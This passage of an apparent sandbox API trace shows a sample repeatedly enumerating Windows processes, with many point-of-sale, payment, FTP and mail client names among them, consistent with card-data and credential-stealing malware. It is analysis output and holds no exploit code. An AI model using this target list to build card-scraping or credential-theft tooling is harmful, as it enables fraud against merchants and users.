hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0264.837] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0264.839] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0264.845] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x594, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0264.846] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0264.848] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0264.849] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0264.851] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x100c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0264.853] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1018, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0264.886] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1028, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0264.888] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1034, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="likely-final-out.exe")) returned 1 [0264.891] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="local reality bank.exe")) returned 1 [0264.893] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="kitchen-box-instead.exe")) returned 1 [0264.895] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1058, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x9dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0264.897] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0264.899] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x127c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0264.901] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0264.940] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0264.942] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0264.944] CloseHandle (hObject=0x9e0) returned 1 [0264.944] Sleep (dwMilliseconds=0x64) [0265.064] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x758 [0265.081] Process32First (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0265.083] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x79, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0265.085] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0265.087] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0265.089] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0265.095] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0265.097] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0265.099] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0265.101] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0265.103] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0265.112] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0265.115] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0265.117] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4a, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0265.119] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0265.122] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0265.127] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0265.129] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0265.131] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0265.133] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0265.135] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0265.154] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0265.156] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0265.158] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0265.160] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0265.162] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0265.164] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0265.167] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0265.219] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0265.221] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0265.223] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x838, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0265.225] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0265.228] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0265.230] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="studentbecausedemocratic.exe")) returned 1 [0265.243] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="share.exe")) returned 1 [0265.245] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="myself.exe")) returned 1 [0265.248] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="feel.exe")) returned 1 [0265.249] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="action program citizen.exe")) returned 1 [0265.252] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="reachinvolve.exe")) returned 1 [0265.254] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="question.exe")) returned 1 [0265.256] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="play hit.exe")) returned 1 [0265.258] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mean.exe")) returned 1 [0265.260] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xde0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="evening.exe")) returned 1 [0265.310] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="memory everybody nature.exe")) returned 1 [0265.312] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="structurecausebar.exe")) returned 1 [0265.314] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="good.exe")) returned 1 [0265.316] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="item study safe.exe")) returned 1 [0265.318] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="health-prove-opportunity.exe")) returned 1 [0265.320] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="break.exe")) returned 1 [0265.322] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe44, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="minute-budget-themselves.exe")) returned 1 [0265.324] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0265.326] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0265.328] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0265.330] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0265.332] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0265.334] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0265.336] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0265.338] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xea0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0265.340] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0265.343] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0265.345] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0265.348] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0265.350] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0265.352] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xee4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0265.355] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xef8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0265.524] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | 